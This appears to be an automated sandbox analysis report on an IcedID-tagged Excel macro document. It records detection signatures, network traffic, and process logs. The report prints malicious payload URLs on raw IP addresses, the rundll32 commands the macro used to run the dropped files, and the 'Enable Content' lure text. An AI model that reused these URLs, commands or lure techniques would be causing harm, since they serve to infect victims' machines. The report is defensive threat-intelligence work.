Analysis Report 91476525608-04012021.xlsm

Overview

General Information

Sample Name: 91476525608-04012021.xlsm
Analysis ID: 380316
MD5: e8d0244666daf465e9914a7f56938412
SHA1: 3c5f71752b0cea18b06dfad9a96cdfeb053f45cc
SHA256: 196668480754f95f98c6e59d4776e4f8c756ad3be9fd48a27cfcb50be329567e
Tags: IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://195.123.210.186/44285,5327891204.dat Avira URL Cloud: Label: malware
Source: http://91.211.89.28/44285,5327891204.dat Avira URL Cloud: Label: malware
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 45.150.67.243:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 45.150.67.243:80

Networking:

barindex
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.123.210.186 195.123.210.186
Source: Joe Sandbox View IP Address: 45.150.67.243 45.150.67.243
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44285,5327891204.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.150.67.243Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44285,5327891204.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 195.123.210.186Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44285,5327891204.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.211.89.28Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 45.150.67.243
Source: unknown TCP traffic detected without corresponding DNS query: 45.150.67.243
Source: unknown TCP traffic detected without corresponding DNS query: 45.150.67.243
Source: unknown TCP traffic detected without corresponding DNS query: 45.150.67.243
Source: unknown TCP traffic detected without corresponding DNS query: 91.211.89.28
Source: unknown TCP traffic detected without corresponding DNS query: 91.211.89.28
Source: unknown TCP traffic detected without corresponding DNS query: 91.211.89.28
Source: unknown TCP traffic detected without corresponding DNS query: 91.211.89.28
Source: unknown TCP traffic detected without corresponding DNS query: 45.150.67.243
Source: unknown TCP traffic detected without corresponding DNS query: 91.211.89.28
Source: unknown TCP traffic detected without corresponding DNS query: 91.211.89.28
Source: unknown TCP traffic detected without corresponding DNS query: 45.150.67.243
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5AD18CF.gif Jump to behavior
Source: global traffic HTTP traffic detected: GET /44285,5327891204.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.150.67.243Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44285,5327891204.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 195.123.210.186Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44285,5327891204.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.211.89.28Connection: Keep-Alive
Source: rundll32.exe, 00000003.00000002.2101536953.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2098502758.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2092405392.0000000001BB0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: rundll32.exe, 00000003.00000002.2101536953.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2098502758.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2092405392.0000000001BB0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2101536953.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2098502758.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2092405392.0000000001BB0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2102626617.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2098708455.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2092605284.0000000001D97000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2102626617.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2098708455.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2092605284.0000000001D97000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2102626617.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2098708455.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2092605284.0000000001D97000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2102626617.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2098708455.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2092605284.0000000001D97000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2101536953.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2098502758.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2092405392.0000000001BB0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2102626617.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2098708455.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2092605284.0000000001D97000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2101536953.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2098502758.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2092405392.0000000001BB0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000005.00000002.2092405392.0000000001BB0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Found malicious Excel 4.0 Macro
Source: 91476525608-04012021.xlsm Initial sample: URLDownloadToFileA
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing button from the yellow bar ab' r,,dll Once you have enabled editing, please click
Source: Screenshot number: 8 Screenshot OCR: Enable editing button from the yellow bar above 15 0 Once you have enabled editing, please click En
Source: Screenshot number: 8 Screenshot OCR: Enable Content button from the yellow bar above 16 17 18 19 20 21 22 ' 23 24 25 26 27 2
Source: Document image extraction number: 0 Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0 Screenshot OCR: Enable Content button from the yellow bar above
Source: Document image extraction number: 1 Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 1 Screenshot OCR: Enable Content button from the yellow bar above
Found Excel 4.0 Macro with suspicious formulas
Source: 91476525608-04012021.xlsm Initial sample: EXEC
Source: 91476525608-04012021.xlsm Initial sample: EXEC
Source: 91476525608-04012021.xlsm Initial sample: EXEC
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 91476525608-04012021.xlsm OLE, VBA macro line: Private Sub Auto_Open()
Document contains embedded VBA macros
Source: 91476525608-04012021.xlsm OLE indicator, VBA macros: true
Source: rundll32.exe, 00000003.00000002.2101536953.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2098502758.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2092405392.0000000001BB0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal80.expl.evad.winXLSM@7/7@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$91476525608-04012021.xlsm Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC6A8.tmp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur,PluginInit
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur,PluginInit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur1,PluginInit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur2,PluginInit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur,PluginInit Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur1,PluginInit Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur2,PluginInit Jump to behavior
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 91476525608-04012021.xlsm Initial sample: OLE zip file path = xl/media/image1.gif
Source: 91476525608-04012021.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 380316 Sample: 91476525608-04012021.xlsm Startdate: 01/04/2021 Architecture: WINDOWS Score: 80 25 Antivirus detection for URL or domain 2->25 27 Found malicious Excel 4.0 Macro 2->27 29 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->29 31 3 other signatures 2->31 6 EXCEL.EXE 85 40 2->6         started        process3 dnsIp4 19 195.123.210.186, 49168, 80 ITL-LV Bulgaria 6->19 21 91.211.89.28, 49169, 80 HOSTFORYUA Ukraine 6->21 23 45.150.67.243, 49167, 80 ASDETUKhttpwwwheficedcomGB Montenegro 6->23 17 C:\Users\user\...\~$91476525608-04012021.xlsm, data 6->17 dropped 33 Document exploit detected (UrlDownloadToFile) 6->33 11 rundll32.exe 6->11         started        13 rundll32.exe 6->13         started        15 rundll32.exe 6->15         started        file5 signatures6 process7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.123.210.186
unknown Bulgaria
50979 ITL-LV false
45.150.67.243
unknown Montenegro
61317 ASDETUKhttpwwwheficedcomGB false
91.211.89.28
unknown Ukraine
206638 HOSTFORYUA false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://195.123.210.186/44285,5327891204.dat true
  • Avira URL Cloud: malware
unknown
http://91.211.89.28/44285,5327891204.dat true
  • Avira URL Cloud: malware
unknown
http://45.150.67.243/44285,5327891204.dat false
  • Avira URL Cloud: safe
unknown